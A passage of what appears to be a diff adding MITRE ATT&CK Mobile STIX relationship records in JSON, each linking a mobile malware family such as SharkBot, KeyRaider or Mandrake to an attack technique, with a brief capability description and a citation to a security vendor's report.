"relationship--24a7379e-a994-411b-b17c-add6c6c6fc07", + "type": "relationship", + "created": "2020-12-24T21:45:56.949Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:45:56.949Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) has hidden malicious functionality in a second stage file and has encrypted C2 server information.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--92129d5b-7822-4e84-8a69-f96b598fba9e", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "modified": "2019-10-10T15:27:22.175Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) accesses databases from WhatsApp, Viber, Skype, and Line.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d70aaf50-29b7-4687-98ea-ffaa3fa858c0", + "type": "relationship", + "created": "2020-12-24T21:55:56.692Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.692Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has searched for specific existing data directories, including the Gmail app, Dropbox app, Pictures, and thumbnails.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--078653a6-3613-4923-ae5a-1bccb8552e67", + "type": "relationship", + "created": "2020-09-11T16:22:03.250Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:22:03.250Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) has been installed in two stages and can secretly install new applications.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8f72a070-cfcb-4d75-ace6-b4427f3ba8d3", + "created": "2020-04-08T15:41:19.404Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cofense Anubis", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020.", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:18:13.761Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can steal the device’s contact list.(Citation: Cofense Anubis) ", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0bb6f851-4302-4936-a98e-d23feecb234d", + "type": "relationship", + "created": "2020-06-02T14:32:31.777Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-02T14:32:31.777Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) exploits a WebKit vulnerability to achieve root access on the device.(Citation: Volexity Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--05563777-5771-4bd6-a1af-3e244cf42372", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "Most [KeyRaider](https://attack.mitre.org/software/S0288) samples search to find the Apple account's username, password and device's GUID in data being transferred.(Citation: Xiao-KeyRaider)", + "relationship_type": "uses", + "source_ref": "malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3f392718-87c4-483b-b89f-4f0cc056d251", + "type": "relationship", + "created": "2020-07-20T13:58:53.610Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." + } + ], + "modified": "2020-09-24T15:12:24.302Z", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) can obtain the device’s UDID, version number, and product number.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8611661c-04b4-4a82-9669-2d0e26b7b3f3", + "created": "2020-07-15T20:20:59.287Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:53:17.865Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can disable Play Protect.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0f70bdf1-a6a7-406c-a4c0-cee509ff8369", + "created": "2023-02-02T17:46:27.077Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:43:17.131Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can exfiltrate captured user credentials and event logs back to the C2 server. (Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8c9dbc53-27d2-420c-b698-98c23a7ead2b", + "created": "2020-09-11T14:54:16.638Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/desert-scorpion-google-play" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:36:55.810Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can delete copies of itself if additional APKs are downloaded to external storage.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fa5f3aea-2131-4690-8833-dc428fae2b22", + "created": "2023-01-18T21:38:34.350Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:57:53.504Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can intercept notifications to send to the C2 server and take advantage of the Direct Reply feature.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d64c4924-76f0-4b2e-858d-b0df733334d0", + "created": "2023-02-06T19:03:11.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:23:09.430Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can modify system settings to give itself device administrator privileges.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7b1477bc-8fd0-45ce-8eaa-b3b307f18024", + "created": "2022-04-15T18:11:06.097Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Skycure-Profiles", + "description": "Yair Amit. (2013, March 12). Malicious Profiles - The Sleeping Giant of iOS Security. Retrieved December 22, 2016.", + "url": "https://www.skycure.com/blog/malicious-profiles-the-sleeping-giant-of-ios-security/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:28:11.000Z", + "description": "Most [KeyRaider](https://attack.mitre.org/software/S0288) samples hook SSLRead and SSLWrite functions in the itunesstored process to intercept device communication with the Apple App Store.(Citation: Skycure-Profiles)", + "relationship_type": "uses", + "source_ref": "malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--27247071-356b-4b5f-bc8f-6436a3fec095", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[PJApps](https://attack.mitre.org/software/S0291) has the capability to collect and leak the victim's location.(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--c709da93-20c3-4d17-ab68-48cba76b2137", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ed48a86f-e55f-4abf-8f18-98591b756399", + "created": "2023-03-03T16:19:30.443Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:19:30.443Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has hidden the app icon from iOS springboard.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2c9ad579-0c29-4f2a-80f3-242dc6b0bafd", + "type": "relationship", + "created": "2020-09-11T14:54:16.644Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.644Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can list files stored on external storage.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b1e5bd2f-01e4-402d-a9b6-255110510a83", + "type": "relationship", + "created": "2020-12-24T21:45:56.986Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:45:56.986Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can install new applications which are obtained from the C2 server.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a8079e6a-ef87-4e3b-9f71-cf1ea2360892", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:53:24.312Z", + "description": "[Adups](https://attack.mitre.org/software/S0309) transmitted contact lists.(Citation: NYTimes-BackDoor)", + "relationship_type": "uses", + "source_ref": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1c42ee3a-c400-4de6-84aa-b254422af7b9", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CheckPoint-Judy", + "url": "https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/", + "description": "CheckPoint. (2017, May 25). The Judy Malware: Possibly the largest malware campaign found on Google Play. Retrieved September 18, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Judy](https://attack.mitre.org/software/S0325) uses infected devices to generate fraudulent clicks on advertisements to generate revenue.(Citation: CheckPoint-Judy)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--172444ab-97fc-4d94-b142-179452bfb760", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0bcdeb29-6eed-4c96-a9ae-e56aadc4a5db", + "type": "relationship", + "created": "2019-08-09T17:59:48.988Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-08-09T17:59:48.988Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) can record and take pictures using the front and back cameras.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5ced57a7-b674-40d4-98b8-a090963a6ade", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-09-18T13:45:58.872Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) abuses Accessibility features to steal messages from popular apps such as WeChat, Skype, Viber, and QQ.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b43f4cef-138e-4b5d-8e68-e8eeae3591be", + "created": "2021-02-17T20:43:52.337Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020.", + "url": "https://blog.lookout.com/frozencell-mobile-threat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:30:32.294Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has read SMS messages for exfiltration.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--da4296d7-5fdb-45b6-9791-b023d634c08d", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "source_name": "TrendMicro-RCSAndroid" + } + ], + "modified": "2019-08-09T17:53:48.760Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can record location.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cc81b56c-cf73-4307-b950-e80246985195", + "created": "2019-10-18T14:50:57.473Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "OS security updates typically contain exploit patches when disclosed.", + "modified": "2022-03-28T19:20:44.337Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d63f27cf-95a3-42bb-86dd-dc18e22cb898", + "created": "2019-09-04T14:28:16.414Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + 